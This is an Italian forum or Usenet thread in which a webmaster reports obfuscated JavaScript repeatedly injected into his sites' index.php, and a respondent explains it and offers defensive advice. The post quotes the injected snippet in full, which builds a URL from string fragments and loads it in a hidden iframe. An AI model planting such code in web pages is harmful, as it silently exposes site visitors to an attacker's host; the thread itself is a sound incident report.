Qualcuno/qualcosa mi cancella un'istruzione js...

Ho uno stranissimo problema...
Sono due giorni che mi trovo dello strano codice nell'index.php
Il codice, che sembra js, è questo e viene piazzato infondo alla pagina:

lc='/';a='rc';xk='h.c';lg='am';cr='?15';tq='ifr';ql='5' ;fr='oba';j='ara';br='n';xb='0aa';g='a82';u='om/';s='k';bx='s';tg='6a';r='itc';jg='6cc';et='b8';m= '41';n='un';k='5';y='c0f';vj='p:';t='ef2';l='//b';dx='411';c='cdz';qv='9';kw='htt';b='eb';pf='6'; ch='mas';p='79';x='e';lj='prf';z='ofo';tk=tq.conca t(lg,x);e=bx.concat(a);pv=kw.concat(vj,l,j,s,fr,ch ,n,z,br,b,r,xk,u,c,lj,lc,cr,k,pf,p,tg,m,jg,xb,y,et ,t,dx,qv,g,ql);var
rb=document.createElement(tk);rb.setAttribute('wid th','5');rb.setAttribute('height','5');rb.setAttri bute('style','display:none');rb.setAttribute(e,pv) ;document.body.appendChild(rb);

non ho idea di cosa faccia ma me lo ritrovo nell'index.php di miei 2 siti,
ho cambiato le pwd di accesso ed il giorno dopo mi sono ritrovato punto e a
capo.

I 2 siti sono collegati, o meglio da uno dei due si può risalire all'altro
(esiste un collegamento in tutte e due le direzioni e credo che questo sia
il collegamento).

Detto questo, altra cosa strana è che in uno dei 2 index oltre a comparire
questo codice, scompare una istruzione js all'interno delle pagina che,
all'apparenza sembra innocua (sta li da più di un anno) ed è questa:
<script type="text/javascript">
/* Optional: Temporarily hide the "tabber" class so it does not "flash"
on the page as plain HTML. After tabber runs, the class is changed
to "tabberlive" and it will appear. */
document.write('<style
type="text/css">.tabber{display:none;}<\/style>');
</script>


Avete una vaga idea del perchè succeda questo?
Grazie in anticipo.

"enos76" <enos76 (AT) gmail (DOT) com> ha scritto nel messaggio
news:4ad4a49f$0$1416$4fafbaef (AT) reader4 (DOT) news.tin.it...

Grazie infinite per la riposta.

Quote:

Il codice JavaScript che hai trovato, non e' altro che un ingenuo
tentativo di offuscamento di creazione di un iFrame nascosto, il cui
indirizzo di destinazione redireziona verso Google con un 302.

Ok

Quote:

La teoria piu' plausibile e' che un bot abbia violato il tuo sistema,

ma per "mio sistema" intendi il mio sito? Si tratta di poche pagine in php
senza cms, blog o altro.

Quote:

che a sua volta cerca di avvisare il proprietario del bot (probabilmente
lo
stesso del dominio di destinazione) di essere pronto a ricevere ordini.
Avvisa l'amministratore del tuo server di aggiornare il programma (CMS?)
violato e soprattutto di rimuovere il problema nel caso si sia propagato
all'interno del server.

Ho contattato chi mi da spazio host, stiamo cercando di capire, loro escludo
problema lato host e pensano a qualche applicativo
sul mio sito...

Come posso difendermi?

Per ora ho impostato i permessi sull'index.php su 444 ma non credo di poter
fare altro.

SanGo wrote: [...]

Quote:

ma per "mio sistema" intendi il mio sito? Si tratta di poche pagine in
php senza cms, blog o altro.

Per dirti qualcosa di concreto, dovrei avere sottomano il tuo codice PHP,
e dovrei avere l'autorizzazione dell'amministratore del tuo server a fare
una enumerazione remota di eventuali vulnerabilita'.

Quote:

[...] Come posso difendermi?

La sicurezza va pensata a 360 gradi: come una catena, e' efficace quanto
il piu' debole dei propri anelli. Essere invulnerabili e' impossibile, ma
e' possibile predisporre difese che rendano lo sforzo di superarle
sproporzionato in relazione ai vantaggi che derivano all'attaccante.

Nel tuo caso specifico, accertati di programmare in modo sicuro leggendo
i manuali OWASP (per il WEB) e OSSTMM (generale), poi cerca qualcosa di
specifico per PHP.

http://www.owasp.org/index.php/Top_10_2007
http://www.isecom.org/osstmm/

Quote:

Per ora ho impostato i permessi sull'index.php su 444 ma non credo di
poter fare altro.

E' un passo avanti, ma se il codice PHP viene eseguito con i tuoi stessi
privilegi, potra' cambiarsi i permessi da solo.


Non ti preoccupare troppo: raramente lo scopo dell'attaccante e' fare
danni al sistema compromesso. Il problema e' che se sono riusciti a
scrivere sul tuo filesystem, avevano probabilmente il potere di fare
qualsiasi cosa per cui fossero sufficienti i tuoi privilegi, compreso
installare backdoor, attaccare altri pc, inviare spam ecc.

Nei tuoi panni io chiederei consiglio sulla mailing list di sikurezza.org

https://www.sikurezza.org/lists/listinfo/ml


Auguri
--
Enos /* looking4work */ enos76 -(at)- gmail -(dot)- com

enos76 wrote:

Quote:

Nei tuoi panni io chiederei consiglio sulla mailing list di
sikurezza.org

https://www.sikurezza.org/lists/listinfo/ml

Mi documenterò.
Grazie per le info.